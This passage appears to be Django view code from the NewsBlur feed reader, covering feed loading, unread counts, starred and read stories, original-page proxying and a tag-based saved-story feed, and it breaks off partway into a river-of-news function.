    day_ago = datetime.datetime.now() - datetime.timedelta(days=1)
    scheduled_feeds = []
    iphone_version = "2.1"
    
    # NOTE(review): is_true() above should already have normalized these;
    # the string comparison looks redundant -- confirm is_true's handling
    # of 'false' before removing.
    if include_favicons == 'false': include_favicons = False
    if update_counts == 'false': update_counts = False
    
    if not user.is_authenticated():
        return HttpResponseForbidden()
    
    try:
        folders = UserSubscriptionFolders.objects.get(user=user)
    except UserSubscriptionFolders.DoesNotExist:
        folders = []
        
    user_subs = UserSubscription.objects.select_related('feed').filter(user=user, active=True)
    # A user with folders but no active subs likely deactivated everything;
    # reactivate so the client has something to show.
    if not user_subs and folders:
        folders.auto_activate()
        user_subs = UserSubscription.objects.select_related('feed').filter(user=user, active=True)

    for sub in user_subs:
        if update_counts and sub.needs_unread_recalc:
            sub.calculate_feed_scores(silent=True)
        feeds[sub.feed_id] = sub.canonical(include_favicon=include_favicons)
        # Collect stale or broken feeds for an immediate refetch below.
        if not sub.feed.active and not sub.feed.has_feed_exception:
            scheduled_feeds.append(sub.feed.pk)
        elif sub.feed.active_subscribers <= 0:
            scheduled_feeds.append(sub.feed.pk)
        elif sub.feed.next_scheduled_update < day_ago:
            scheduled_feeds.append(sub.feed.pk)
    
    if len(scheduled_feeds) > 0 and request.user.is_authenticated():
        logging.user(request, "~SN~FMTasking the scheduling immediate fetch of ~SB%s~SN feeds..." % 
                     len(scheduled_feeds))
        ScheduleImmediateFetches.apply_async(kwargs=dict(feed_ids=scheduled_feeds, user_id=user.pk))
    
    flat_folders = []
    if folders:
        flat_folders = folders.flatten_folders(feeds=feeds)
        
    social_params = {
        'user_id': user.pk,
        'include_favicon': include_favicons,
        'update_counts': update_counts,
    }
    social_feeds = MSocialSubscription.feeds(**social_params)
    social_profile = MSocialProfile.profile(user.pk)
    social_services = MSocialServices.profile(user.pk)
    starred_counts, starred_count = MStarredStoryCounts.user_counts(user.pk, include_total=True)
    # Per-tag counts exist but no total: fall back to a direct count.
    if not starred_count and len(starred_counts):
        starred_count = MStarredStory.objects(user_id=user.pk).count()

    # Offer category suggestions to users with no subscriptions yet.
    categories = None
    if not user_subs:
        categories = MCategory.serialize()
        
    logging.user(request, "~FB~SBLoading ~FY%s~FB/~FM%s~FB feeds/socials ~FMflat~FB%s" % (
            len(feeds.keys()), len(social_feeds), '. ~FCUpdating counts.' if update_counts else ''))

    data = {
        "flat_folders": flat_folders, 
        "feeds": feeds,
        "social_feeds": social_feeds,
        "social_profile": social_profile,
        "social_services": social_services,
        "user": user.username,
        "is_staff": user.is_staff,
        "user_profile": user.profile,
        "iphone_version": iphone_version,
        "categories": categories,
        'starred_count': starred_count,
        'starred_counts': starred_counts,
    }
    return data

@ratelimit(minutes=1, requests=10)
@never_cache
@json.json_view
def refresh_feeds(request):
    """Return refreshed unread counts (and optionally favicons) for feeds.

    Splits the requested ids into site feeds and 'social:'-prefixed feeds,
    recomputes their counts, and patches in favicon data for any feeds the
    client says it is still waiting on. Also remaps ids of feeds that were
    merged into duplicates.
    """
    user = get_user(request)
    feed_ids = request.REQUEST.getlist('feed_id')
    check_fetch_status = request.REQUEST.get('check_fetch_status')
    favicons_fetching = request.REQUEST.getlist('favicons_fetching')
    # Ids prefixed with 'social:' belong to social subscriptions.
    social_feed_ids = [feed_id for feed_id in feed_ids if 'social:' in feed_id]
    feed_ids = list(set(feed_ids) - set(social_feed_ids))
    
    feeds = {}
    # No explicit ids at all means "refresh everything" on both sides.
    if feed_ids or (not social_feed_ids and not feed_ids):
        feeds = UserSubscription.feeds_with_updated_counts(user, feed_ids=feed_ids, 
                                                           check_fetch_status=check_fetch_status)
    social_feeds = {}
    if social_feed_ids or (not social_feed_ids and not feed_ids):
        social_feeds = MSocialSubscription.feeds_with_updated_counts(user, social_feed_ids=social_feed_ids)
    
    favicons_fetching = [int(f) for f in favicons_fetching if f]
    feed_icons = {}
    if favicons_fetching:
        feed_icons = dict([(i.feed_id, i) for i in MFeedIcon.objects(feed_id__in=favicons_fetching)])
    
    # Attach freshly fetched favicon data to the feeds the client asked about.
    for feed_id, feed in feeds.items():
        if feed_id in favicons_fetching and feed_id in feed_icons:
            feeds[feed_id]['favicon'] = feed_icons[feed_id].data
            feeds[feed_id]['favicon_color'] = feed_icons[feed_id].color
            feeds[feed_id]['favicon_fetching'] = feed.get('favicon_fetching')

    user_subs = UserSubscription.objects.filter(user=user, active=True).only('feed')
    sub_feed_ids = [s.feed_id for s in user_subs]

    if favicons_fetching:
        # Favicon requests for feeds the user isn't subscribed to are likely
        # feeds that were merged into a duplicate; remap to the canonical id.
        moved_feed_ids = [f for f in favicons_fetching if f not in sub_feed_ids]
        for moved_feed_id in moved_feed_ids:
            duplicate_feeds = DuplicateFeed.objects.filter(duplicate_feed_id=moved_feed_id)

            if duplicate_feeds and duplicate_feeds[0].feed.pk in feeds:
                feeds[moved_feed_id] = feeds[duplicate_feeds[0].feed_id]
                feeds[moved_feed_id]['dupe_feed_id'] = duplicate_feeds[0].feed_id
    
    if check_fetch_status:
        # Requested feeds that aren't subscribed may have been deduplicated;
        # point the client at the canonical feed id.
        missing_feed_ids = list(set(feed_ids) - set(sub_feed_ids))
        if missing_feed_ids:
            duplicate_feeds = DuplicateFeed.objects.filter(duplicate_feed_id__in=missing_feed_ids)
            for duplicate_feed in duplicate_feeds:
                feeds[duplicate_feed.duplicate_feed_id] = {'id': duplicate_feed.feed_id}
    
    interactions_count = MInteraction.user_unread_count(user.pk)

    # NOTE(review): 'True or' makes this log line unconditional; looks like a
    # leftover debug toggle -- confirm intent before tightening the condition.
    if True or settings.DEBUG or check_fetch_status:
        logging.user(request, "~FBRefreshing %s feeds (%s/%s)" % (
            len(feeds.keys()), check_fetch_status, len(favicons_fetching)))

    return {
        'feeds': feeds, 
        'social_feeds': social_feeds,
        'interactions_count': interactions_count,
    }

@json.json_view
def interactions_count(request):
    """Return the current user's unread-interactions count as JSON."""
    user = get_user(request)
    return {
        'interactions_count': MInteraction.user_unread_count(user.pk),
    }
    
@never_cache
@ajax_login_required
@json.json_view
def feed_unread_count(request):
    """Recalculate and return unread counts for the requested feed ids.

    Ids prefixed with 'social:' are routed to social subscriptions;
    everything else is treated as a site feed id.
    """
    user = request.user
    requested_ids = request.REQUEST.getlist('feed_id')
    force = request.REQUEST.get('force', False)
    social_ids = [fid for fid in requested_ids if 'social:' in fid]
    site_ids = list(set(requested_ids) - set(social_ids))

    feeds = (UserSubscription.feeds_with_updated_counts(user, feed_ids=site_ids, force=force)
             if site_ids else {})
    social_feeds = (MSocialSubscription.feeds_with_updated_counts(user, social_feed_ids=social_ids)
                    if social_ids else {})

    # Build a human-readable label for the log line.
    if len(site_ids) == 1:
        feed_title = Feed.get_by_id(site_ids[0]).feed_title if settings.DEBUG else site_ids[0]
    elif len(social_ids) == 1:
        feed_title = MSocialProfile.objects.get(user_id=social_ids[0].replace('social:', '')).username
    else:
        feed_title = "%s feeds" % (len(feeds) + len(social_feeds))
    logging.user(request, "~FBUpdating unread count on: %s" % feed_title)

    return {'feeds': feeds, 'social_feeds': social_feeds}
    
def refresh_feed(request, feed_id):
    """Force-fetch a feed and recalculate the requesting user's unread scores.

    Returns the freshly loaded feed payload via load_single_feed(). 404s if
    the feed does not exist. If the user has no subscription to this feed
    (e.g. an anonymous/shared view via get_user), the fetch still happens
    but the per-user score recalculation is skipped instead of raising an
    unhandled UserSubscription.DoesNotExist (500).
    """
    user = get_user(request)
    feed = get_object_or_404(Feed, pk=feed_id)

    # Force an immediate fetch; per-user scores are recomputed below.
    feed = feed.update(force=True, compute_scores=False)
    try:
        usersub = UserSubscription.objects.get(user=user, feed=feed)
    except UserSubscription.DoesNotExist:
        usersub = None
    if usersub:
        usersub.calculate_feed_scores(silent=False)

    logging.user(request, "~FBRefreshing feed: %s" % feed)

    return load_single_feed(request, feed_id)
    
@never_cache
@json.json_view
def load_single_feed(request, feed_id):
    """Load one page of stories for a single feed, annotated per-user.

    Applies search/starred/unread filters, merges in shared-story comments,
    intelligence classifier scores, read/starred/shared state, and localized
    dates. Non-premium users cannot search. Returns the payload dict for
    the json_view decorator.
    """
    start                   = time.time()
    user                    = get_user(request)
    # offset                  = int(request.REQUEST.get('offset', 0))
    # limit                   = int(request.REQUEST.get('limit', 6))
    limit                   = 6
    page                    = int(request.REQUEST.get('page', 1))
    offset                  = limit * (page-1)
    order                   = request.REQUEST.get('order', 'newest')
    read_filter             = request.REQUEST.get('read_filter', 'all')
    query                   = request.REQUEST.get('query')
    include_story_content   = is_true(request.REQUEST.get('include_story_content', True))
    include_hidden          = is_true(request.REQUEST.get('include_hidden', False))
    message                 = None
    user_search             = None

    dupe_feed_id = None
    user_profiles = []
    now = localtime_for_timezone(datetime.datetime.now(), user.profile.timezone)
    if not feed_id: raise Http404

    feed_address = request.REQUEST.get('feed_address')
    feed = Feed.get_by_id(feed_id, feed_address=feed_address)
    if not feed:
        raise Http404
    
    try:
        usersub = UserSubscription.objects.get(user=user, feed=feed)
    except UserSubscription.DoesNotExist:
        # Not subscribed: stories are still shown, but without per-user
        # read state, and feed.canonical() is merged into the payload below.
        usersub = None
    
    # Pick the story source: search, starred, unread-aware, or plain pages.
    if query:
        if user.profile.is_premium:
            user_search = MUserSearch.get_user(user.pk)
            user_search.touch_search_date()
            stories = feed.find_stories(query, order=order, offset=offset, limit=limit)
        else:
            stories = []
            message = "You must be a premium subscriber to search."
    elif read_filter == 'starred':
        mstories = MStarredStory.objects(
            user_id=user.pk,
            story_feed_id=feed_id
        ).order_by('%sstarred_date' % ('-' if order == 'newest' else ''))[offset:offset+limit]
        stories = Feed.format_stories(mstories) 
    elif usersub and (read_filter == 'unread' or order == 'oldest'):
        stories = usersub.get_stories(order=order, read_filter=read_filter, offset=offset, limit=limit,
                                      default_cutoff_date=user.profile.unread_cutoff)
    else:
        stories = feed.get_stories(offset, limit)
    
    checkpoint1 = time.time()
    
    try:
        stories, user_profiles = MSharedStory.stories_with_comments_and_profiles(stories, user.pk)
    except redis.ConnectionError:
        # Best-effort: shared-story decoration is dropped if redis is down.
        logging.user(request, "~BR~FK~SBRedis is unavailable for shared stories.")

    checkpoint2 = time.time()
    
    # Get intelligence classifier for user
    
    if usersub and usersub.is_trained:
        classifier_feeds   = list(MClassifierFeed.objects(user_id=user.pk, feed_id=feed_id, social_user_id=0))
        classifier_authors = list(MClassifierAuthor.objects(user_id=user.pk, feed_id=feed_id))
        classifier_titles  = list(MClassifierTitle.objects(user_id=user.pk, feed_id=feed_id))
        classifier_tags    = list(MClassifierTag.objects(user_id=user.pk, feed_id=feed_id))
    else:
        classifier_feeds = []
        classifier_authors = []
        classifier_titles = []
        classifier_tags = []
    classifiers = get_classifiers_for_user(user, feed_id=feed_id, 
                                           classifier_feeds=classifier_feeds, 
                                           classifier_authors=classifier_authors, 
                                           classifier_titles=classifier_titles,
                                           classifier_tags=classifier_tags)
    checkpoint3 = time.time()
    
    # Look up per-story state (unread/starred/shared) in bulk before the
    # per-story annotation loop below.
    unread_story_hashes = []
    if stories:
        if (read_filter == 'all' or query) and usersub:
            unread_story_hashes = UserSubscription.story_hashes(user.pk, read_filter='unread',
                                                      feed_ids=[usersub.feed_id],
                                                      usersubs=[usersub],
                                                      group_by_feed=False,
                                                      cutoff_date=user.profile.unread_cutoff)
        story_hashes = [story['story_hash'] for story in stories if story['story_hash']]
        starred_stories = MStarredStory.objects(user_id=user.pk, 
                                                story_feed_id=feed.pk, 
                                                story_hash__in=story_hashes)\
                                       .only('story_hash', 'starred_date', 'user_tags')
        shared_story_hashes = MSharedStory.check_shared_story_hashes(user.pk, story_hashes)
        shared_stories = []
        if shared_story_hashes:
            shared_stories = MSharedStory.objects(user_id=user.pk, 
                                                  story_hash__in=shared_story_hashes)\
                                         .only('story_hash', 'shared_date', 'comments')
        starred_stories = dict([(story.story_hash, dict(starred_date=story.starred_date,
                                                        user_tags=story.user_tags))
                                for story in starred_stories])
        shared_stories = dict([(story.story_hash, dict(shared_date=story.shared_date,
                                                       comments=story.comments))
                               for story in shared_stories])
            
    checkpoint4 = time.time()
    
    # Annotate each story with localized dates, read/starred/shared state,
    # and intelligence scores.
    for story in stories:
        if not include_story_content:
            del story['story_content']
        story_date = localtime_for_timezone(story['story_date'], user.profile.timezone)
        nowtz = localtime_for_timezone(now, user.profile.timezone)
        story['short_parsed_date'] = format_story_link_date__short(story_date, nowtz)
        story['long_parsed_date'] = format_story_link_date__long(story_date, nowtz)
        if usersub:
            story['read_status'] = 1
            if (read_filter == 'all' or query) and usersub:
                story['read_status'] = 1 if story['story_hash'] not in unread_story_hashes else 0
            elif read_filter == 'unread' and usersub:
                story['read_status'] = 0
            if story['story_hash'] in starred_stories:
                story['starred'] = True
                starred_date = localtime_for_timezone(starred_stories[story['story_hash']]['starred_date'],
                                                      user.profile.timezone)
                story['starred_date'] = format_story_link_date__long(starred_date, now)
                story['starred_timestamp'] = starred_date.strftime('%s')
                story['user_tags'] = starred_stories[story['story_hash']]['user_tags']
            if story['story_hash'] in shared_stories:
                story['shared'] = True
                shared_date = localtime_for_timezone(shared_stories[story['story_hash']]['shared_date'],
                                                     user.profile.timezone)
                story['shared_date'] = format_story_link_date__long(shared_date, now)
                story['shared_comments'] = strip_tags(shared_stories[story['story_hash']]['comments'])
        else:
            # No subscription: everything reads as already-read.
            story['read_status'] = 1
        story['intelligence'] = {
            'feed': apply_classifier_feeds(classifier_feeds, feed),
            'author': apply_classifier_authors(classifier_authors, story),
            'tags': apply_classifier_tags(classifier_tags, story),
            'title': apply_classifier_titles(classifier_titles, story),
        }
        story['score'] = UserSubscription.score_story(story['intelligence'])
        
    # Intelligence
    feed_tags = json.decode(feed.data.popular_tags) if feed.data.popular_tags else []
    feed_authors = json.decode(feed.data.popular_authors) if feed.data.popular_authors else []
    
    if usersub:
        # Track opens; the unread count needs a recalc after reading.
        usersub.feed_opens += 1
        usersub.needs_unread_recalc = True
        usersub.save(update_fields=['feed_opens', 'needs_unread_recalc'])
    
    # Timing breakdown for the log line (only shown when slow or DEBUG).
    diff1 = checkpoint1-start
    diff2 = checkpoint2-start
    diff3 = checkpoint3-start
    diff4 = checkpoint4-start
    timediff = time.time()-start
    last_update = relative_timesince(feed.last_update)
    time_breakdown = ""
    if timediff > 1 or settings.DEBUG:
        time_breakdown = "~SN~FR(~SB%.4s/%.4s/%.4s/%.4s~SN)" % (
                          diff1, diff2, diff3, diff4)
    
    search_log = "~SN~FG(~SB%s~SN) " % query if query else ""
    logging.user(request, "~FYLoading feed: ~SB%s%s (%s/%s) %s%s" % (
        feed.feed_title[:22], ('~SN/p%s' % page) if page > 1 else '', order, read_filter, search_log, time_breakdown))

    # Strip negatively-scored (hidden) stories unless the client wants them.
    if not include_hidden:
        hidden_stories_removed = 0
        new_stories = []
        for story in stories:
            if story['score'] >= 0:
                new_stories.append(story)
            else:
                hidden_stories_removed += 1
        stories = new_stories
    
    data = dict(stories=stories, 
                user_profiles=user_profiles,
                feed_tags=feed_tags, 
                feed_authors=feed_authors, 
                classifiers=classifiers,
                updated=last_update,
                user_search=user_search,
                feed_id=feed.pk,
                elapsed_time=round(float(timediff), 2),
                message=message)
    
    if not include_hidden: data['hidden_stories_removed'] = hidden_stories_removed
    if dupe_feed_id: data['dupe_feed_id'] = dupe_feed_id
    if not usersub:
        data.update(feed.canonical())
    # if not usersub and feed.num_subscribers <= 1:
    #     data = dict(code=-1, message="You must be subscribed to this feed.")
    
    # if page <= 3:
    #     import random
    #     time.sleep(random.randint(2, 4))
    
    # if page == 2:
    #     assert False

    return data

def load_feed_page(request, feed_id):
    """Serve the original (scraped) HTML page for a feed.

    Tries, in order: the original-page node server, S3 (proxied or via
    redirect), then the Mongo-backed MFeedPage store. Falls back to a
    404 page when nothing is available.
    """
    if not feed_id:
        raise Http404
    
    feed = Feed.get_by_id(feed_id)
    
    if feed and feed.has_page and not feed.has_page_exception:
        if settings.BACKED_BY_AWS.get('pages_on_node'):
            url = "http://%s/original_page/%s" % (
                settings.ORIGINAL_PAGE_SERVER,
                feed.pk,
            )
            page_response = requests.get(url)
            if page_response.status_code == 200:
                # The node server stores gzipped content; pass it through
                # with the matching Content-Encoding header.
                response = HttpResponse(page_response.content, mimetype="text/html; charset=utf-8")
                response['Content-Encoding'] = 'gzip'
                response['Last-Modified'] = page_response.headers.get('Last-modified')
                response['Etag'] = page_response.headers.get('Etag')
                response['Content-Length'] = str(len(page_response.content))
                logging.user(request, "~FYLoading original page, proxied from node: ~SB%s bytes" %
                             (len(page_response.content)))
                return response
        
        if settings.BACKED_BY_AWS['pages_on_s3'] and feed.s3_page:
            if settings.PROXY_S3_PAGES:
                key = settings.S3_PAGES_BUCKET.get_key(feed.s3_pages_key)
                if key:
                    # S3 objects are stored gzipped; serve as-is.
                    compressed_data = key.get_contents_as_string()
                    response = HttpResponse(compressed_data, mimetype="text/html; charset=utf-8")
                    response['Content-Encoding'] = 'gzip'
            
                    logging.user(request, "~FYLoading original page, proxied: ~SB%s bytes" %
                                 (len(compressed_data)))
                    return response
            else:
                # Protocol-relative redirect straight to the S3 bucket.
                logging.user(request, "~FYLoading original page, non-proxied")
                return HttpResponseRedirect('//%s/%s' % (settings.S3_PAGES_BUCKET_NAME,
                                                         feed.s3_pages_key))
    
    data = MFeedPage.get_data(feed_id=feed_id)
    
    if not data or not feed or not feed.has_page or feed.has_page_exception:
        logging.user(request, "~FYLoading original page, ~FRmissing")
        return render(request, 'static/404_original_page.xhtml', {}, 
            content_type='text/html',
            status=404)
    
    logging.user(request, "~FYLoading original page, from the db")
    return HttpResponse(data, mimetype="text/html; charset=utf-8")

@json.json_view
def load_starred_stories(request):
    """Load a page of the user's saved (starred) stories.

    Supports full-text search (`query`, premium only), filtering by
    `tag` (premium only), or an explicit list of story hashes (`h`).
    Stories are decorated with shared-story state and localized dates;
    feeds the user isn't subscribed to are included in the payload.
    """
    user         = get_user(request)
    offset       = int(request.REQUEST.get('offset', 0))
    limit        = int(request.REQUEST.get('limit', 10))
    page         = int(request.REQUEST.get('page', 0))
    query        = request.REQUEST.get('query')
    order        = request.REQUEST.get('order', 'newest')
    tag          = request.REQUEST.get('tag')
    story_hashes = request.REQUEST.getlist('h')[:100]
    version      = int(request.REQUEST.get('v', 1))
    now          = localtime_for_timezone(datetime.datetime.now(), user.profile.timezone)
    message      = None
    order_by     = '-' if order == "newest" else ""
    # An explicit page number overrides any raw offset.
    if page: offset = limit * (page - 1)
    
    if query:
        # results = SearchStarredStory.query(user.pk, query)                                                            
        # story_ids = [result.db_id for result in results]                                                          
        if user.profile.is_premium:
            stories = MStarredStory.find_stories(query, user.pk, tag=tag, offset=offset, limit=limit,
                                                 order=order)
        else:
            stories = []
            message = "You must be a premium subscriber to search."
    elif tag:
        if user.profile.is_premium:
            mstories = MStarredStory.objects(
                user_id=user.pk,
                user_tags__contains=tag
            ).order_by('%sstarred_date' % order_by)[offset:offset+limit]
            stories = Feed.format_stories(mstories)        
        else:
            stories = []
            message = "You must be a premium subscriber to read saved stories by tag."
    elif story_hashes:
        mstories = MStarredStory.objects(
            user_id=user.pk,
            story_hash__in=story_hashes
        ).order_by('%sstarred_date' % order_by)[offset:offset+limit]
        stories = Feed.format_stories(mstories)
    else:
        mstories = MStarredStory.objects(
            user_id=user.pk
        ).order_by('%sstarred_date' % order_by)[offset:offset+limit]
        stories = Feed.format_stories(mstories)
    
    stories, user_profiles = MSharedStory.stories_with_comments_and_profiles(stories, user.pk, check_all=True)
    
    # Include canonical data for feeds the user isn't subscribed to, so
    # the client can still render those stories' feed titles/favicons.
    story_hashes   = [story['story_hash'] for story in stories]
    story_feed_ids = list(set(s['story_feed_id'] for s in stories))
    usersub_ids    = UserSubscription.objects.filter(user__pk=user.pk, feed__pk__in=story_feed_ids).values('feed__pk')
    usersub_ids    = [us['feed__pk'] for us in usersub_ids]
    unsub_feed_ids = list(set(story_feed_ids).difference(set(usersub_ids)))
    unsub_feeds    = Feed.objects.filter(pk__in=unsub_feed_ids)
    unsub_feeds    = dict((feed.pk, feed.canonical(include_favicon=False)) for feed in unsub_feeds)
    shared_story_hashes = MSharedStory.check_shared_story_hashes(user.pk, story_hashes)
    shared_stories = []
    if shared_story_hashes:
        shared_stories = MSharedStory.objects(user_id=user.pk, 
                                              story_hash__in=shared_story_hashes)\
                                     .only('story_hash', 'shared_date', 'comments')
    shared_stories = dict([(story.story_hash, dict(shared_date=story.shared_date,
                                                   comments=story.comments))
                           for story in shared_stories])

    # Annotate each story with localized dates and starred/shared state.
    nowtz = localtime_for_timezone(now, user.profile.timezone)
    for story in stories:
        story_date                 = localtime_for_timezone(story['story_date'], user.profile.timezone)
        story['short_parsed_date'] = format_story_link_date__short(story_date, nowtz)
        story['long_parsed_date']  = format_story_link_date__long(story_date, nowtz)
        starred_date               = localtime_for_timezone(story['starred_date'], user.profile.timezone)
        story['starred_date']      = format_story_link_date__long(starred_date, nowtz)
        story['starred_timestamp'] = starred_date.strftime('%s')
        story['read_status']       = 1
        story['starred']           = True
        story['intelligence']      = {
            'feed':   1,
            'author': 0,
            'tags':   0,
            'title':  0,
        }
        if story['story_hash'] in shared_stories:
            story['shared'] = True
            story['shared_comments'] = strip_tags(shared_stories[story['story_hash']]['comments'])
    
    search_log = "~SN~FG(~SB%s~SN)" % query if query else ""
    logging.user(request, "~FCLoading starred stories: ~SB%s stories %s" % (len(stories), search_log))
    
    return {
        "stories": stories,
        "user_profiles": user_profiles,
        'feeds': unsub_feeds.values() if version == 2 else unsub_feeds,
        "message": message,
    }

@json.json_view
def starred_story_hashes(request):
    """Return every starred-story hash for the requesting user, newest first.

    When ``include_timestamps`` is truthy, each entry is a
    (story_hash, unix-timestamp-string) pair instead of a bare hash.
    """
    user               = get_user(request)
    include_timestamps = is_true(request.REQUEST.get('include_timestamps', False))
    
    starred = MStarredStory.objects(
        user_id=user.pk
    ).only('story_hash', 'starred_date').order_by('-starred_date')
    
    if include_timestamps:
        story_hashes = [(story.story_hash, story.starred_date.strftime("%s"))
                        for story in starred]
    else:
        story_hashes = [story.story_hash for story in starred]
    
    logging.user(request, "~FYLoading ~FCstarred story hashes~FY: %s story hashes" % 
                           (len(story_hashes)))

    return dict(starred_story_hashes=story_hashes)

def starred_stories_rss_feed(request, user_id, secret_token, tag_slug):
    """Public feed of a user's 25 most recently saved stories for one tag.

    ``secret_token`` is carried in the URL (and echoed into the feed's
    self-link) so the feed can be fetched without a session. Raises
    Http404 when the user or the tag's saved-story count record is missing.
    """
    try:
        user = User.objects.get(pk=user_id)
    except User.DoesNotExist:
        raise Http404
    
    try:
        tag_counts = MStarredStoryCounts.objects.get(user_id=user_id, slug=tag_slug)
    except MStarredStoryCounts.MultipleObjectsReturned:
        # Duplicate count rows can exist for the same slug; take the first.
        tag_counts = MStarredStoryCounts.objects(user_id=user_id, slug=tag_slug).first()
    except MStarredStoryCounts.DoesNotExist:
        raise Http404
    
    data = {}
    data['title'] = "Saved Stories - %s" % tag_counts.tag
    data['link'] = "%s%s" % (
        settings.NEWSBLUR_URL,
        reverse('saved-stories-tag', kwargs=dict(tag_name=tag_slug)))
    data['description'] = "Stories saved by %s on NewsBlur with the tag \"%s\"." % (user.username,
                                                                                    tag_counts.tag)
    data['lastBuildDate'] = datetime.datetime.utcnow()
    data['generator'] = 'NewsBlur - %s' % settings.NEWSBLUR_URL
    data['docs'] = None
    data['author_name'] = user.username
    data['feed_url'] = "%s%s" % (
        settings.NEWSBLUR_URL,
        reverse('starred-stories-rss-feed', 
                kwargs=dict(user_id=user_id, secret_token=secret_token, tag_slug=tag_slug)),
    )
    rss = feedgenerator.Atom1Feed(**data)

    # An empty tag means "all saved stories"; otherwise filter by user_tags.
    if not tag_counts.tag:
        starred_stories = MStarredStory.objects(
            user_id=user.pk
        ).order_by('-starred_date').limit(25)
    else:
        starred_stories = MStarredStory.objects(
            user_id=user.pk,
            user_tags__contains=tag_counts.tag
        ).order_by('-starred_date').limit(25)
    for starred_story in starred_stories:
        story_data = {
            'title': starred_story.story_title,
            'link': starred_story.story_permalink,
            # story_content_z is zlib-compressed; a falsy value passes through.
            'description': (starred_story.story_content_z and
                            zlib.decompress(starred_story.story_content_z)),
            'author_name': starred_story.story_author_name,
            'categories': starred_story.story_tags,
            'unique_id': starred_story.story_guid,
            'pubdate': starred_story.starred_date,
        }
        rss.add_item(**story_data)
        
    logging.user(request, "~FBGenerating ~SB%s~SN's saved story RSS feed (%s, %s stories): ~FM%s" % (
        user.username,
        tag_counts.tag,
        tag_counts.count,
        request.META.get('HTTP_USER_AGENT', "")[:24]
    ))
    # NOTE(review): payload is an Atom1Feed but served as application/rss+xml —
    # presumably intentional for client compatibility; confirm.
    return HttpResponse(rss.writeString('utf-8'), content_type='application/rss+xml')

@json.json_view
def load_read_stories(request):
    """Load one page of the user's recently read stories, with share/star state.

    Search (``query``) is stubbed out: it returns an empty page plus a
    "Not implemented yet." message. Otherwise hashes come from redis
    (RUserStory) and story documents from mongo, re-sorted to match the
    redis ordering.
    """
    user   = get_user(request)
    offset = int(request.REQUEST.get('offset', 0))
    limit  = int(request.REQUEST.get('limit', 10))
    page   = int(request.REQUEST.get('page', 0))
    order  = request.REQUEST.get('order', 'newest')
    query  = request.REQUEST.get('query')
    now    = localtime_for_timezone(datetime.datetime.now(), user.profile.timezone)
    message = None
    # Page takes precedence over an explicit offset.
    if page: offset = limit * (page - 1)
    
    if query:
        stories = []
        message = "Not implemented yet."
        # if user.profile.is_premium:
        #     stories = MStarredStory.find_stories(query, user.pk, offset=offset, limit=limit)
        # else:
        #     stories = []
        #     message = "You must be a premium subscriber to search."
    else:
        story_hashes = RUserStory.get_read_stories(user.pk, offset=offset, limit=limit, order=order)
        mstories = MStory.objects(story_hash__in=story_hashes)
        stories = Feed.format_stories(mstories)
        # Mongo doesn't preserve the redis ordering; re-sort by hash position.
        stories = sorted(stories, key=lambda story: story_hashes.index(story['story_hash']),
                         reverse=bool(order=="oldest"))
    
    stories, user_profiles = MSharedStory.stories_with_comments_and_profiles(stories, user.pk, check_all=True)
    
    # Canonicalize any feeds the stories belong to that the user is no
    # longer subscribed to, so the client can still render them.
    story_hashes   = [story['story_hash'] for story in stories]
    story_feed_ids = list(set(s['story_feed_id'] for s in stories))
    usersub_ids    = UserSubscription.objects.filter(user__pk=user.pk, feed__pk__in=story_feed_ids).values('feed__pk')
    usersub_ids    = [us['feed__pk'] for us in usersub_ids]
    unsub_feed_ids = list(set(story_feed_ids).difference(set(usersub_ids)))
    unsub_feeds    = Feed.objects.filter(pk__in=unsub_feed_ids)
    unsub_feeds    = [feed.canonical(include_favicon=False) for feed in unsub_feeds]

    # Look up which of these stories the user has shared or starred.
    shared_stories = MSharedStory.objects(user_id=user.pk, 
                                          story_hash__in=story_hashes)\
                                 .only('story_hash', 'shared_date', 'comments')
    shared_stories = dict([(story.story_hash, dict(shared_date=story.shared_date,
                                                   comments=story.comments))
                           for story in shared_stories])
    starred_stories = MStarredStory.objects(user_id=user.pk, 
                                            story_hash__in=story_hashes)\
                                   .only('story_hash', 'starred_date')
    starred_stories = dict([(story.story_hash, story.starred_date) 
                            for story in starred_stories])
    
    # NOTE(review): `now` was already localized above, so this localizes it a
    # second time — presumably localtime_for_timezone is idempotent; confirm.
    nowtz = localtime_for_timezone(now, user.profile.timezone)
    for story in stories:
        story_date                 = localtime_for_timezone(story['story_date'], user.profile.timezone)
        story['short_parsed_date'] = format_story_link_date__short(story_date, nowtz)
        story['long_parsed_date']  = format_story_link_date__long(story_date, nowtz)
        story['read_status']       = 1
        # Neutral intelligence, with a baseline +1 on the feed axis.
        story['intelligence']      = {
            'feed':   1,
            'author': 0,
            'tags':   0,
            'title':  0,
        }
        if story['story_hash'] in starred_stories:
            story['starred'] = True
            starred_date = localtime_for_timezone(starred_stories[story['story_hash']],
                                                  user.profile.timezone)
            story['starred_date'] = format_story_link_date__long(starred_date, now)
            story['starred_timestamp'] = starred_date.strftime('%s')
        if story['story_hash'] in shared_stories:
            story['shared'] = True
            story['shared_comments'] = strip_tags(shared_stories[story['story_hash']]['comments'])
    
    search_log = "~SN~FG(~SB%s~SN)" % query if query else ""
    logging.user(request, "~FCLoading read stories: ~SB%s stories %s" % (len(stories), search_log))
    
    return {
        "stories": stories,
        "user_profiles": user_profiles,
        "feeds": unsub_feeds,
        "message": message,
    }

@json.json_view
def load_river_stories__redis(request):
    """River of News: load one page of stories across many feeds at once.

    Story selection, in priority order:
      1. explicit story hashes (``h``, capped at 100),
      2. a premium-only full-text ``query``,
      3. ``read_filter == 'starred'`` (saved stories for these feeds),
      4. the redis-backed unread/all story-hash lookup per subscription.
    Stories are then annotated with read/star state and per-feed intelligence
    classifier scores; negative-score ("hidden") stories are stripped unless
    ``include_hidden`` is set.
    """
    limit             = 12
    start             = time.time()
    user              = get_user(request)
    message           = None
    # Feed ids arrive either as 'feeds' or the abbreviated 'f' parameter.
    feed_ids          = [int(feed_id) for feed_id in request.REQUEST.getlist('feeds') if feed_id]
    if not feed_ids:
        feed_ids      = [int(feed_id) for feed_id in request.REQUEST.getlist('f') if feed_id]
    story_hashes      = request.REQUEST.getlist('h')[:100]
    original_feed_ids = list(feed_ids)
    page              = int(request.REQUEST.get('page', 1))
    order             = request.REQUEST.get('order', 'newest')
    read_filter       = request.REQUEST.get('read_filter', 'unread')
    query             = request.REQUEST.get('query')
    include_hidden    = is_true(request.REQUEST.get('include_hidden', False))
    now               = localtime_for_timezone(datetime.datetime.now(), user.profile.timezone)
    usersubs          = []
    code              = 1
    user_search       = None
    # NOTE(review): limit becomes the page's *end* index, not a page size —
    # downstream callees receive offset/limit as a [offset, limit) window.
    offset = (page-1) * limit
    limit = page * limit
